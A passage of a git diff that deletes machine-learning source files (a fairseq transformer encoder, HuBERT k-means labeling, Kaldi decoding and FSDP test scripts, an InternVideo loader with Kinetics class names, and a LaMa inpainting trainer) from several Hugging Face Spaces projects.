= [] - - if return_all_hiddens: - encoder_states.append(x) - - # encoder layers - for layer in self.layers: - x = layer( - x, encoder_padding_mask=encoder_padding_mask if has_pads else None - ) - if return_all_hiddens: - assert encoder_states is not None - encoder_states.append(x) - - if self.layer_norm is not None: - x = self.layer_norm(x) - - # The Pytorch Mobile lite interpreter does not supports returning NamedTuple in - # `forward` so we use a dictionary instead. - # TorchScript does not support mixed values so the values are all lists. - # The empty list is equivalent to None. 
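        # src_lengths counts the non-padding tokens in each sentence and is reshaped to
        # B x 1 (int32) so it can be stored in the list-valued dictionary below.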
- src_lengths = src_tokens.ne(self.padding_idx).sum(dim=1, dtype=torch.int32).reshape(-1, 1).contiguous() - return { - "encoder_out": [x], # T x B x C - "encoder_padding_mask": [encoder_padding_mask], # B x T - "encoder_embedding": [encoder_embedding], # B x T x C - "encoder_states": encoder_states, # List[T x B x C] - "src_tokens": [], - "src_lengths": [src_lengths], - } - - @torch.jit.export - def reorder_encoder_out(self, encoder_out: Dict[str, List[Tensor]], new_order): - """ - Reorder encoder output according to *new_order*. - - Args: - encoder_out: output from the ``forward()`` method - new_order (LongTensor): desired order - - Returns: - *encoder_out* rearranged according to *new_order* - """ - if len(encoder_out["encoder_out"]) == 0: - new_encoder_out = [] - else: - new_encoder_out = [encoder_out["encoder_out"][0].index_select(1, new_order)] - if len(encoder_out["encoder_padding_mask"]) == 0: - new_encoder_padding_mask = [] - else: - new_encoder_padding_mask = [ - encoder_out["encoder_padding_mask"][0].index_select(0, new_order) - ] - if len(encoder_out["encoder_embedding"]) == 0: - new_encoder_embedding = [] - else: - new_encoder_embedding = [ - encoder_out["encoder_embedding"][0].index_select(0, new_order) - ] - - if len(encoder_out["src_tokens"]) == 0: - src_tokens = [] - else: - src_tokens = [(encoder_out["src_tokens"][0]).index_select(0, new_order)] - - if len(encoder_out["src_lengths"]) == 0: - src_lengths = [] - else: - src_lengths = [(encoder_out["src_lengths"][0]).index_select(0, new_order)] - - encoder_states = encoder_out["encoder_states"] - if len(encoder_states) > 0: - for idx, state in enumerate(encoder_states): - encoder_states[idx] = state.index_select(1, new_order) - - return { - "encoder_out": new_encoder_out, # T x B x C - "encoder_padding_mask": new_encoder_padding_mask, # B x T - "encoder_embedding": new_encoder_embedding, # B x T x C - "encoder_states": encoder_states, # List[T x B x C] - "src_tokens": src_tokens, # B x T - "src_lengths": src_lengths, # B x 1 - } - - def max_positions(self): - """Maximum input length supported by the encoder.""" - if self.embed_positions is None: - return self.max_source_positions - return min(self.max_source_positions, self.embed_positions.max_positions) - - def upgrade_state_dict_named(self, state_dict, name): - """Upgrade a (possibly old) state dict for new versions of fairseq.""" - if isinstance(self.embed_positions, SinusoidalPositionalEmbedding): - weights_key = "{}.embed_positions.weights".format(name) - if weights_key in state_dict: - print("deleting {0}".format(weights_key)) - del state_dict[weights_key] - state_dict[ - "{}.embed_positions._float_tensor".format(name) - ] = torch.FloatTensor(1) - for i in range(self.num_layers): - # update layer norms - self.layers[i].upgrade_state_dict_named( - state_dict, "{}.layers.{}".format(name, i) - ) - - version_key = "{}.version".format(name) - if utils.item(state_dict.get(version_key, torch.Tensor([1]))[0]) < 2: - # earlier checkpoints did not normalize after the stack of layers - self.layer_norm = None - self.normalize = False - state_dict[version_key] = torch.Tensor([1]) - return state_dict - - -class TransformerEncoder(TransformerEncoderBase): - def __init__(self, args, dictionary, embed_tokens): - self.args = args - super().__init__( - TransformerConfig.from_namespace(args), - dictionary, - embed_tokens, - ) - - def build_encoder_layer(self, args): - return super().build_encoder_layer( - TransformerConfig.from_namespace(args), - ) diff --git 
a/spaces/OFA-Sys/OFA-Visual_Grounding/fairseq/examples/hubert/simple_kmeans/dump_km_label.py b/spaces/OFA-Sys/OFA-Visual_Grounding/fairseq/examples/hubert/simple_kmeans/dump_km_label.py deleted file mode 100644 index 8871307804d3f1e5c7cc49061614c69df26ab1ee..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Visual_Grounding/fairseq/examples/hubert/simple_kmeans/dump_km_label.py +++ /dev/null @@ -1,98 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import logging -import os -import sys - -import numpy as np - -import joblib -import torch -import tqdm - -logging.basicConfig( - format="%(asctime)s | %(levelname)s | %(name)s | %(message)s", - datefmt="%Y-%m-%d %H:%M:%S", - level=os.environ.get("LOGLEVEL", "INFO").upper(), - stream=sys.stdout, -) -logger = logging.getLogger("dump_km_label") - - -class ApplyKmeans(object): - def __init__(self, km_path): - self.km_model = joblib.load(km_path) - self.C_np = self.km_model.cluster_centers_.transpose() - self.Cnorm_np = (self.C_np ** 2).sum(0, keepdims=True) - - self.C = torch.from_numpy(self.C_np) - self.Cnorm = torch.from_numpy(self.Cnorm_np) - if torch.cuda.is_available(): - self.C = self.C.cuda() - self.Cnorm = self.Cnorm.cuda() - - def __call__(self, x): - if isinstance(x, torch.Tensor): - dist = ( - x.pow(2).sum(1, keepdim=True) - - 2 * torch.matmul(x, self.C) - + self.Cnorm - ) - return dist.argmin(dim=1).cpu().numpy() - else: - dist = ( - (x ** 2).sum(1, keepdims=True) - - 2 * np.matmul(x, self.C_np) - + self.Cnorm_np - ) - return np.argmin(dist, axis=1) - - -def get_feat_iterator(feat_dir, split, nshard, rank): - feat_path = f"{feat_dir}/{split}_{rank}_{nshard}.npy" - leng_path = f"{feat_dir}/{split}_{rank}_{nshard}.len" - with open(leng_path, "r") as f: - lengs = [int(line.rstrip()) for line in f] - offsets = [0] + np.cumsum(lengs[:-1]).tolist() - - def iterate(): - feat = np.load(feat_path, mmap_mode="r") - assert feat.shape[0] == (offsets[-1] + lengs[-1]) - for offset, leng in zip(offsets, lengs): - yield feat[offset: offset + leng] - - return iterate, len(lengs) - - -def dump_label(feat_dir, split, km_path, nshard, rank, lab_dir): - apply_kmeans = ApplyKmeans(km_path) - generator, num = get_feat_iterator(feat_dir, split, nshard, rank) - iterator = generator() - - lab_path = f"{lab_dir}/{split}_{rank}_{nshard}.km" - os.makedirs(lab_dir, exist_ok=True) - with open(lab_path, "w") as f: - for feat in tqdm.tqdm(iterator, total=num): - # feat = torch.from_numpy(feat).cuda() - lab = apply_kmeans(feat).tolist() - f.write(" ".join(map(str, lab)) + "\n") - logger.info("finished successfully") - - -if __name__ == "__main__": - import argparse - - parser = argparse.ArgumentParser() - parser.add_argument("feat_dir") - parser.add_argument("split") - parser.add_argument("km_path") - parser.add_argument("nshard", type=int) - parser.add_argument("rank", type=int) - parser.add_argument("lab_dir") - args = parser.parse_args() - logging.info(str(args)) - - dump_label(**vars(args)) diff --git a/spaces/OFA-Sys/OFA-vqa/fairseq/examples/wav2vec/unsupervised/kaldi_self_train/st/decode_word_step1.sh b/spaces/OFA-Sys/OFA-vqa/fairseq/examples/wav2vec/unsupervised/kaldi_self_train/st/decode_word_step1.sh deleted file mode 100644 index c1276bbe4d0e02deb984c7c10d6c0486dce09a5f..0000000000000000000000000000000000000000 --- 
a/spaces/OFA-Sys/OFA-vqa/fairseq/examples/wav2vec/unsupervised/kaldi_self_train/st/decode_word_step1.sh +++ /dev/null @@ -1,46 +0,0 @@ -#!/bin/bash - -# prepare word WFSTs, reference data, and decode - -set -eu - -w2v_dir= # same as in train.sh -out_dir= # same as in train.sh -lexicon= # word to phone mapping -wrd_arpa_lm= # word LM -wrd_arpa_lm_bin= # word LM for KenLM, used in unsupervised selection - -dec_exp= # what HMM stage to decode (e.g., tri3b) -dec_script= # what decoding script to use (e.g., steps/decode_fmllr.sh) -phn_label=phnc -wrd_label=wrd -dec_suffix=word -dec_splits="train valid" -valid_split="valid" - -data_dir=$out_dir/data -wrd_data_dir=$out_dir/data_word - -lexicon_clean=$(mktemp) -cat $lexicon | sort | uniq > $lexicon_clean -local/prepare_lang_word.sh $w2v_dir/dict.${phn_label}.txt $data_dir $lexicon_clean && rm $lexicon_clean -local/prepare_lm.sh --langdir $data_dir/lang_word --lmdir $data_dir/lang_test_word $wrd_arpa_lm $data_dir - -for x in $dec_splits; do - x_gt=${x}_gt - mkdir -p $wrd_data_dir/$x_gt - cp $data_dir/$x_gt/{feats.scp,cmvn.scp,utt2spk,spk2utt} $wrd_data_dir/$x_gt/ - python local/copy_aligned_text.py < $w2v_dir/$x.$wrd_label > $wrd_data_dir/$x_gt/text -done - -local/decode.sh --nj 40 --graph_name graph${dec_suffix} --decode_suffix $dec_suffix \ - --val_sets "$dec_splits" --decode_script $dec_script \ - $out_dir/exp/$dec_exp $data_dir $data_dir/lang_test_word - -local/unsup_select_decode_word.sh \ - --split $valid_split --kenlm_path $wrd_arpa_lm_bin \ - --ref_txt $wrd_data_dir/${valid_split}_gt/text \ - --psd_txt $data_dir/${valid_split}/text \ - --dec_name decode${dec_suffix} --graph_name graph${dec_suffix} \ - --phonemize_lexicon $data_dir/local/dict_word/lexicon.txt \ - $out_dir/exp diff --git a/spaces/OFA-Sys/OFA-vqa/fairseq/scripts/test_fsdp.sh b/spaces/OFA-Sys/OFA-vqa/fairseq/scripts/test_fsdp.sh deleted file mode 100644 index 1f428a035e4474427ded991f8e8307ea59f61f69..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-vqa/fairseq/scripts/test_fsdp.sh +++ /dev/null @@ -1,24 +0,0 @@ -#!/usr/bin/env bash -rm -rf fsdp_dummy -mkdir -p fsdp_dummy -CUDA_VISIBLE_DEVICES=0,1,2,3 fairseq-train /private/home/sshleifer/data-bin/stories_mmap \ - --ddp-backend fully_sharded --fp16 --fp16-init-scale 4 \ - --cpu-offload --checkpoint-activations \ - --task language_modeling --tokens-per-sample 256 --batch-size 8 \ - --arch transformer_lm_gpt2_tiny \ - --optimizer cpu_adam --adam-betas "(0.9,0.98)" \ - --lr 0.0001 --lr-scheduler polynomial_decay --warmup-updates 5 --total-num-update 10 \ - --max-update 5 --log-format json --log-interval 1 \ - --save-interval-updates 5 --save-dir fsdp_dummy --disable-validation \ - --restore-file x.pt "$@" - -# Now we try to load the checkpoint -CUDA_VISIBLE_DEVICES=0,1 fairseq-train /private/home/sshleifer/data-bin/stories_mmap \ - --ddp-backend fully_sharded --fp16 --fp16-init-scale 4 \ - --cpu-offload --checkpoint-activations \ - --task language_modeling --tokens-per-sample 256 --batch-size 8 \ - --arch transformer_lm_gpt2_tiny \ - --optimizer cpu_adam --adam-betas "(0.9,0.98)" \ - --lr 0.0001 --lr-scheduler polynomial_decay --warmup-updates 5 --total-num-update 10 \ - --max-update 2 --log-format json --log-interval 1 \ - --save-interval-updates 2 --save-dir fsdp_dummy diff --git a/spaces/OkamiFeng/Bark-with-Voice-Cloning/training/__init__.py b/spaces/OkamiFeng/Bark-with-Voice-Cloning/training/__init__.py deleted file mode 100644 index 
e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/OpenGVLab/InternGPT/iGPT/models/load_internvideo.py b/spaces/OpenGVLab/InternGPT/iGPT/models/load_internvideo.py deleted file mode 100644 index da24068b9ac20aa85195c0b2a0e36bf509e2371b..0000000000000000000000000000000000000000 --- a/spaces/OpenGVLab/InternGPT/iGPT/models/load_internvideo.py +++ /dev/null @@ -1,469 +0,0 @@ -from .intern_action import intern_action_b16 -from huggingface_hub import hf_hub_download -# from kinetics_class_index import kinetics_classnames -import torch -import torch.nn as nn -import torchvision.transforms as T -import torch.nn.functional as F -import numpy as np - -from .processing import ( - GroupNormalize, GroupScale, GroupCenterCrop, - Stack, ToTorchFormatTensor -) - -class Intern_Action(nn.Module): - def __init__(self, model): - super().__init__() - self.backbone = model - - def forward(self, x): - return self.backbone(x) - -def get_index(num_frames, num_segments=8): - seg_size = float(num_frames - 1) / num_segments - start = int(seg_size / 2) - offsets = np.array([ - start + int(np.round(seg_size * idx)) for idx in range(num_segments) - ]) - return offsets - -def transform_action(): - # transform - crop_size = 224 - scale_size = 256 - input_mean = [0.485, 0.456, 0.406] - input_std = [0.229, 0.224, 0.225] - - return T.Compose([ - # T.ToPILImage(), - GroupScale(int(scale_size)), - GroupCenterCrop(crop_size), - Stack(), - ToTorchFormatTensor(), - GroupNormalize(input_mean, input_std) - ]) - -def load_intern_action(device): - # Create an id to label name mapping - kinetics_id_to_classname = {} - for k, v in kinetics_classnames.items(): - kinetics_id_to_classname[k] = v - - model_path = hf_hub_download(repo_id="Andy1621/uniformerv2", filename="k400+k710_uniformerv2_b16_8x224.pyth") - # Pick a pretrained model - model = Intern_Action(intern_action_b16(pretrained=False, t_size=8, no_lmhra=True, temporal_downsample=False)) - state_dict = torch.load(model_path, map_location=device) - model.load_state_dict(state_dict) - # Set to eval mode and move to desired device - model = model.to(device) - model = model.eval() - return model - -def cut_frame_to_8(data): - index = np.linspace(0, len(data)-1, 8).astype(int) - return data[index] - -kinetics_classnames = { - "0": "riding a bike", - "1": "marching", - "2": "dodgeball", - "3": "playing cymbals", - "4": "checking tires", - "5": "roller skating", - "6": "tasting beer", - "7": "clapping", - "8": "drawing", - "9": "juggling fire", - "10": "bobsledding", - "11": "petting animal (not cat)", - "12": "spray painting", - "13": "training dog", - "14": "eating watermelon", - "15": "building cabinet", - "16": "applauding", - "17": "playing harp", - "18": "balloon blowing", - "19": "sled dog racing", - "20": "wrestling", - "21": "pole vault", - "22": "hurling (sport)", - "23": "riding scooter", - "24": "shearing sheep", - "25": "sweeping floor", - "26": "eating carrots", - "27": "skateboarding", - "28": "dunking basketball", - "29": "disc golfing", - "30": "eating spaghetti", - "31": "playing flute", - "32": "riding mechanical bull", - "33": "making sushi", - "34": "trapezing", - "35": "picking fruit", - "36": "stretching leg", - "37": "playing ukulele", - "38": "tying tie", - "39": "skydiving", - "40": "playing cello", - "41": "jumping into pool", - "42": "shooting goal (soccer)", - "43": "trimming trees", - "44": "bookbinding", - "45": "ski jumping", - "46": "walking the dog", - "47": "riding unicycle", - "48": "shaving head", - 
"49": "hopscotch", - "50": "playing piano", - "51": "parasailing", - "52": "bartending", - "53": "kicking field goal", - "54": "finger snapping", - "55": "dining", - "56": "yawning", - "57": "peeling potatoes", - "58": "canoeing or kayaking", - "59": "front raises", - "60": "laughing", - "61": "dancing macarena", - "62": "digging", - "63": "reading newspaper", - "64": "hitting baseball", - "65": "clay pottery making", - "66": "exercising with an exercise ball", - "67": "playing saxophone", - "68": "shooting basketball", - "69": "washing hair", - "70": "lunge", - "71": "brushing hair", - "72": "curling hair", - "73": "kitesurfing", - "74": "tapping guitar", - "75": "bending back", - "76": "skipping rope", - "77": "situp", - "78": "folding paper", - "79": "cracking neck", - "80": "assembling computer", - "81": "cleaning gutters", - "82": "blowing out candles", - "83": "shaking hands", - "84": "dancing gangnam style", - "85": "windsurfing", - "86": "tap dancing", - "87": "skiing (not slalom or crosscountry)", - "88": "bandaging", - "89": "push up", - "90": "doing nails", - "91": "punching person (boxing)", - "92": "bouncing on trampoline", - "93": "scrambling eggs", - "94": "singing", - "95": "cleaning floor", - "96": "krumping", - "97": "drumming fingers", - "98": "snowmobiling", - "99": "gymnastics tumbling", - "100": "headbanging", - "101": "catching or throwing frisbee", - "102": "riding elephant", - "103": "bee keeping", - "104": "feeding birds", - "105": "snatch weight lifting", - "106": "mowing lawn", - "107": "fixing hair", - "108": "playing trumpet", - "109": "flying kite", - "110": "crossing river", - "111": "swinging legs", - "112": "sanding floor", - "113": "belly dancing", - "114": "sneezing", - "115": "clean and jerk", - "116": "side kick", - "117": "filling eyebrows", - "118": "shuffling cards", - "119": "recording music", - "120": "cartwheeling", - "121": "feeding fish", - "122": "folding clothes", - "123": "water skiing", - "124": "tobogganing", - "125": "blowing leaves", - "126": "smoking", - "127": "unboxing", - "128": "tai chi", - "129": "waxing legs", - "130": "riding camel", - "131": "slapping", - "132": "tossing salad", - "133": "capoeira", - "134": "playing cards", - "135": "playing organ", - "136": "playing violin", - "137": "playing drums", - "138": "tapping pen", - "139": "vault", - "140": "shoveling snow", - "141": "playing tennis", - "142": "getting a tattoo", - "143": "making a sandwich", - "144": "making tea", - "145": "grinding meat", - "146": "squat", - "147": "eating doughnuts", - "148": "ice fishing", - "149": "snowkiting", - "150": "kicking soccer ball", - "151": "playing controller", - "152": "giving or receiving award", - "153": "welding", - "154": "throwing discus", - "155": "throwing axe", - "156": "ripping paper", - "157": "swimming butterfly stroke", - "158": "air drumming", - "159": "blowing nose", - "160": "hockey stop", - "161": "taking a shower", - "162": "bench pressing", - "163": "planting trees", - "164": "pumping fist", - "165": "climbing tree", - "166": "tickling", - "167": "high kick", - "168": "waiting in line", - "169": "slacklining", - "170": "tango dancing", - "171": "hurdling", - "172": "carrying baby", - "173": "celebrating", - "174": "sharpening knives", - "175": "passing American football (in game)", - "176": "headbutting", - "177": "playing recorder", - "178": "brush painting", - "179": "garbage collecting", - "180": "robot dancing", - "181": "shredding paper", - "182": "pumping gas", - "183": "rock climbing", - "184": "hula 
hooping", - "185": "braiding hair", - "186": "opening present", - "187": "texting", - "188": "decorating the christmas tree", - "189": "answering questions", - "190": "playing keyboard", - "191": "writing", - "192": "bungee jumping", - "193": "sniffing", - "194": "eating burger", - "195": "playing accordion", - "196": "making pizza", - "197": "playing volleyball", - "198": "tasting food", - "199": "pushing cart", - "200": "spinning poi", - "201": "cleaning windows", - "202": "arm wrestling", - "203": "changing oil", - "204": "swimming breast stroke", - "205": "tossing coin", - "206": "deadlifting", - "207": "hoverboarding", - "208": "cutting watermelon", - "209": "cheerleading", - "210": "snorkeling", - "211": "washing hands", - "212": "eating cake", - "213": "pull ups", - "214": "surfing water", - "215": "eating hotdog", - "216": "holding snake", - "217": "playing harmonica", - "218": "ironing", - "219": "cutting nails", - "220": "golf chipping", - "221": "shot put", - "222": "hugging", - "223": "playing clarinet", - "224": "faceplanting", - "225": "trimming or shaving beard", - "226": "drinking shots", - "227": "riding mountain bike", - "228": "tying bow tie", - "229": "swinging on something", - "230": "skiing crosscountry", - "231": "unloading truck", - "232": "cleaning pool", - "233": "jogging", - "234": "ice climbing", - "235": "mopping floor", - "236": "making bed", - "237": "diving cliff", - "238": "washing dishes", - "239": "grooming dog", - "240": "weaving basket", - "241": "frying vegetables", - "242": "stomping grapes", - "243": "moving furniture", - "244": "cooking sausages", - "245": "doing laundry", - "246": "dying hair", - "247": "knitting", - "248": "reading book", - "249": "baby waking up", - "250": "punching bag", - "251": "surfing crowd", - "252": "cooking chicken", - "253": "pushing car", - "254": "springboard diving", - "255": "swing dancing", - "256": "massaging legs", - "257": "beatboxing", - "258": "breading or breadcrumbing", - "259": "somersaulting", - "260": "brushing teeth", - "261": "stretching arm", - "262": "juggling balls", - "263": "massaging person's head", - "264": "eating ice cream", - "265": "extinguishing fire", - "266": "hammer throw", - "267": "whistling", - "268": "crawling baby", - "269": "using remote controller (not gaming)", - "270": "playing cricket", - "271": "opening bottle", - "272": "playing xylophone", - "273": "motorcycling", - "274": "driving car", - "275": "exercising arm", - "276": "passing American football (not in game)", - "277": "playing kickball", - "278": "sticking tongue out", - "279": "flipping pancake", - "280": "catching fish", - "281": "eating chips", - "282": "shaking head", - "283": "sword fighting", - "284": "playing poker", - "285": "cooking on campfire", - "286": "doing aerobics", - "287": "paragliding", - "288": "using segway", - "289": "folding napkins", - "290": "playing bagpipes", - "291": "gargling", - "292": "skiing slalom", - "293": "strumming guitar", - "294": "javelin throw", - "295": "waxing back", - "296": "riding or walking with horse", - "297": "plastering", - "298": "long jump", - "299": "parkour", - "300": "wrapping present", - "301": "egg hunting", - "302": "archery", - "303": "cleaning toilet", - "304": "swimming backstroke", - "305": "snowboarding", - "306": "catching or throwing baseball", - "307": "massaging back", - "308": "blowing glass", - "309": "playing guitar", - "310": "playing chess", - "311": "golf driving", - "312": "presenting weather forecast", - "313": "rock scissors paper", - "314": 
"high jump", - "315": "baking cookies", - "316": "using computer", - "317": "washing feet", - "318": "arranging flowers", - "319": "playing bass guitar", - "320": "spraying", - "321": "cutting pineapple", - "322": "waxing chest", - "323": "auctioning", - "324": "jetskiing", - "325": "drinking", - "326": "busking", - "327": "playing monopoly", - "328": "salsa dancing", - "329": "waxing eyebrows", - "330": "watering plants", - "331": "zumba", - "332": "chopping wood", - "333": "pushing wheelchair", - "334": "carving pumpkin", - "335": "building shed", - "336": "making jewelry", - "337": "catching or throwing softball", - "338": "bending metal", - "339": "ice skating", - "340": "dancing charleston", - "341": "abseiling", - "342": "climbing a rope", - "343": "crying", - "344": "cleaning shoes", - "345": "dancing ballet", - "346": "driving tractor", - "347": "triple jump", - "348": "throwing ball", - "349": "getting a haircut", - "350": "running on treadmill", - "351": "climbing ladder", - "352": "blasting sand", - "353": "playing trombone", - "354": "drop kicking", - "355": "country line dancing", - "356": "changing wheel", - "357": "feeding goats", - "358": "tying knot (not on a tie)", - "359": "setting table", - "360": "shaving legs", - "361": "kissing", - "362": "riding mule", - "363": "counting money", - "364": "laying bricks", - "365": "barbequing", - "366": "news anchoring", - "367": "smoking hookah", - "368": "cooking egg", - "369": "peeling apples", - "370": "yoga", - "371": "sharpening pencil", - "372": "dribbling basketball", - "373": "petting cat", - "374": "playing ice hockey", - "375": "milking cow", - "376": "shining shoes", - "377": "juggling soccer ball", - "378": "scuba diving", - "379": "playing squash or racquetball", - "380": "drinking beer", - "381": "sign language interpreting", - "382": "playing basketball", - "383": "breakdancing", - "384": "testifying", - "385": "making snowman", - "386": "golf putting", - "387": "playing didgeridoo", - "388": "biking through snow", - "389": "sailing", - "390": "jumpstyle dancing", - "391": "water sliding", - "392": "grooming horse", - "393": "massaging feet", - "394": "playing paintball", - "395": "making a cake", - "396": "bowling", - "397": "contact juggling", - "398": "applying cream", - "399": "playing badminton" -} - diff --git a/spaces/OpenGVLab/InternGPT/third-party/lama/bin/saicinpainting/training/trainers/base.py b/spaces/OpenGVLab/InternGPT/third-party/lama/bin/saicinpainting/training/trainers/base.py deleted file mode 100644 index f1b1c66fc96e7edfba7b1ee193272f92b5db7438..0000000000000000000000000000000000000000 --- a/spaces/OpenGVLab/InternGPT/third-party/lama/bin/saicinpainting/training/trainers/base.py +++ /dev/null @@ -1,291 +0,0 @@ -import copy -import logging -from typing import Dict, Tuple - -import pandas as pd -import pytorch_lightning as ptl -import torch -import torch.nn as nn -import torch.nn.functional as F -from torch.utils.data import DistributedSampler - -from saicinpainting.evaluation import make_evaluator -from saicinpainting.training.data.datasets import make_default_train_dataloader, make_default_val_dataloader -from saicinpainting.training.losses.adversarial import make_discrim_loss -from saicinpainting.training.losses.perceptual import PerceptualLoss, ResNetPL -from saicinpainting.training.modules import make_generator, make_discriminator -from saicinpainting.training.visualizers import make_visualizer -from saicinpainting.utils import add_prefix_to_keys, average_dicts, set_requires_grad, flatten_dict, 
\ - get_has_ddp_rank - -LOGGER = logging.getLogger(__name__) - - -def make_optimizer(parameters, kind='adamw', **kwargs): - if kind == 'adam': - optimizer_class = torch.optim.Adam - elif kind == 'adamw': - optimizer_class = torch.optim.AdamW - else: - raise ValueError(f'Unknown optimizer kind {kind}') - return optimizer_class(parameters, **kwargs) - - -def update_running_average(result: nn.Module, new_iterate_model: nn.Module, decay=0.999): - with torch.no_grad(): - res_params = dict(result.named_parameters()) - new_params = dict(new_iterate_model.named_parameters()) - - for k in res_params.keys(): - res_params[k].data.mul_(decay).add_(new_params[k].data, alpha=1 - decay) - - -def make_multiscale_noise(base_tensor, scales=6, scale_mode='bilinear'): - batch_size, _, height, width = base_tensor.shape - cur_height, cur_width = height, width - result = [] - align_corners = False if scale_mode in ('bilinear', 'bicubic') else None - for _ in range(scales): - cur_sample = torch.randn(batch_size, 1, cur_height, cur_width, device=base_tensor.device) - cur_sample_scaled = F.interpolate(cur_sample, size=(height, width), mode=scale_mode, align_corners=align_corners) - result.append(cur_sample_scaled) - cur_height //= 2 - cur_width //= 2 - return torch.cat(result, dim=1) - - -class BaseInpaintingTrainingModule(ptl.LightningModule): - def __init__(self, config, use_ddp, *args, predict_only=False, visualize_each_iters=100, - average_generator=False, generator_avg_beta=0.999, average_generator_start_step=30000, - average_generator_period=10, store_discr_outputs_for_vis=False, - **kwargs): - super().__init__(*args, **kwargs) - LOGGER.info('BaseInpaintingTrainingModule init called') - - self.config = config - - self.generator = make_generator(config, **self.config.generator) - self.use_ddp = use_ddp - - if not get_has_ddp_rank(): - LOGGER.info(f'Generator\n{self.generator}') - - if not predict_only: - self.save_hyperparameters(self.config) - self.discriminator = make_discriminator(**self.config.discriminator) - self.adversarial_loss = make_discrim_loss(**self.config.losses.adversarial) - self.visualizer = make_visualizer(**self.config.visualizer) - self.val_evaluator = make_evaluator(**self.config.evaluator) - self.test_evaluator = make_evaluator(**self.config.evaluator) - - if not get_has_ddp_rank(): - LOGGER.info(f'Discriminator\n{self.discriminator}') - - extra_val = self.config.data.get('extra_val', ()) - if extra_val: - self.extra_val_titles = list(extra_val) - self.extra_evaluators = nn.ModuleDict({k: make_evaluator(**self.config.evaluator) - for k in extra_val}) - else: - self.extra_evaluators = {} - - self.average_generator = average_generator - self.generator_avg_beta = generator_avg_beta - self.average_generator_start_step = average_generator_start_step - self.average_generator_period = average_generator_period - self.generator_average = None - self.last_generator_averaging_step = -1 - self.store_discr_outputs_for_vis = store_discr_outputs_for_vis - - if self.config.losses.get("l1", {"weight_known": 0})['weight_known'] > 0: - self.loss_l1 = nn.L1Loss(reduction='none') - - if self.config.losses.get("mse", {"weight": 0})['weight'] > 0: - self.loss_mse = nn.MSELoss(reduction='none') - - if self.config.losses.perceptual.weight > 0: - self.loss_pl = PerceptualLoss() - - if self.config.losses.get("resnet_pl", {"weight": 0})['weight'] > 0: - self.loss_resnet_pl = ResNetPL(**self.config.losses.resnet_pl) - else: - self.loss_resnet_pl = None - - self.visualize_each_iters = visualize_each_iters - 
LOGGER.info('BaseInpaintingTrainingModule init done') - - def configure_optimizers(self): - discriminator_params = list(self.discriminator.parameters()) - return [ - dict(optimizer=make_optimizer(self.generator.parameters(), **self.config.optimizers.generator)), - dict(optimizer=make_optimizer(discriminator_params, **self.config.optimizers.discriminator)), - ] - - def train_dataloader(self): - kwargs = dict(self.config.data.train) - if self.use_ddp: - kwargs['ddp_kwargs'] = dict(num_replicas=self.trainer.num_nodes * self.trainer.num_processes, - rank=self.trainer.global_rank, - shuffle=True) - dataloader = make_default_train_dataloader(**self.config.data.train) - return dataloader - - def val_dataloader(self): - res = [make_default_val_dataloader(**self.config.data.val)] - - if self.config.data.visual_test is not None: - res = res + [make_default_val_dataloader(**self.config.data.visual_test)] - else: - res = res + res - - extra_val = self.config.data.get('extra_val', ()) - if extra_val: - res += [make_default_val_dataloader(**extra_val[k]) for k in self.extra_val_titles] - - return res - - def training_step(self, batch, batch_idx, optimizer_idx=None): - self._is_training_step = True - return self._do_step(batch, batch_idx, mode='train', optimizer_idx=optimizer_idx) - - def validation_step(self, batch, batch_idx, dataloader_idx): - extra_val_key = None - if dataloader_idx == 0: - mode = 'val' - elif dataloader_idx == 1: - mode = 'test' - else: - mode = 'extra_val' - extra_val_key = self.extra_val_titles[dataloader_idx - 2] - self._is_training_step = False - return self._do_step(batch, batch_idx, mode=mode, extra_val_key=extra_val_key) - - def training_step_end(self, batch_parts_outputs): - if self.training and self.average_generator \ - and self.global_step >= self.average_generator_start_step \ - and self.global_step >= self.last_generator_averaging_step + self.average_generator_period: - if self.generator_average is None: - self.generator_average = copy.deepcopy(self.generator) - else: - update_running_average(self.generator_average, self.generator, decay=self.generator_avg_beta) - self.last_generator_averaging_step = self.global_step - - full_loss = (batch_parts_outputs['loss'].mean() - if torch.is_tensor(batch_parts_outputs['loss']) # loss is not tensor when no discriminator used - else torch.tensor(batch_parts_outputs['loss']).float().requires_grad_(True)) - log_info = {k: v.mean() for k, v in batch_parts_outputs['log_info'].items()} - self.log_dict(log_info, on_step=True, on_epoch=False) - return full_loss - - def validation_epoch_end(self, outputs): - outputs = [step_out for out_group in outputs for step_out in out_group] - averaged_logs = average_dicts(step_out['log_info'] for step_out in outputs) - self.log_dict({k: v.mean() for k, v in averaged_logs.items()}) - - pd.set_option('display.max_columns', 500) - pd.set_option('display.width', 1000) - - # standard validation - val_evaluator_states = [s['val_evaluator_state'] for s in outputs if 'val_evaluator_state' in s] - val_evaluator_res = self.val_evaluator.evaluation_end(states=val_evaluator_states) - val_evaluator_res_df = pd.DataFrame(val_evaluator_res).stack(1).unstack(0) - val_evaluator_res_df.dropna(axis=1, how='all', inplace=True) - LOGGER.info(f'Validation metrics after epoch #{self.current_epoch}, ' - f'total {self.global_step} iterations:\n{val_evaluator_res_df}') - - for k, v in flatten_dict(val_evaluator_res).items(): - self.log(f'val_{k}', v) - - # standard visual test - test_evaluator_states = 
[s['test_evaluator_state'] for s in outputs - if 'test_evaluator_state' in s] - test_evaluator_res = self.test_evaluator.evaluation_end(states=test_evaluator_states) - test_evaluator_res_df = pd.DataFrame(test_evaluator_res).stack(1).unstack(0) - test_evaluator_res_df.dropna(axis=1, how='all', inplace=True) - LOGGER.info(f'Test metrics after epoch #{self.current_epoch}, ' - f'total {self.global_step} iterations:\n{test_evaluator_res_df}') - - for k, v in flatten_dict(test_evaluator_res).items(): - self.log(f'test_{k}', v) - - # extra validations - if self.extra_evaluators: - for cur_eval_title, cur_evaluator in self.extra_evaluators.items(): - cur_state_key = f'extra_val_{cur_eval_title}_evaluator_state' - cur_states = [s[cur_state_key] for s in outputs if cur_state_key in s] - cur_evaluator_res = cur_evaluator.evaluation_end(states=cur_states) - cur_evaluator_res_df = pd.DataFrame(cur_evaluator_res).stack(1).unstack(0) - cur_evaluator_res_df.dropna(axis=1, how='all', inplace=True) - LOGGER.info(f'Extra val {cur_eval_title} metrics after epoch #{self.current_epoch}, ' - f'total {self.global_step} iterations:\n{cur_evaluator_res_df}') - for k, v in 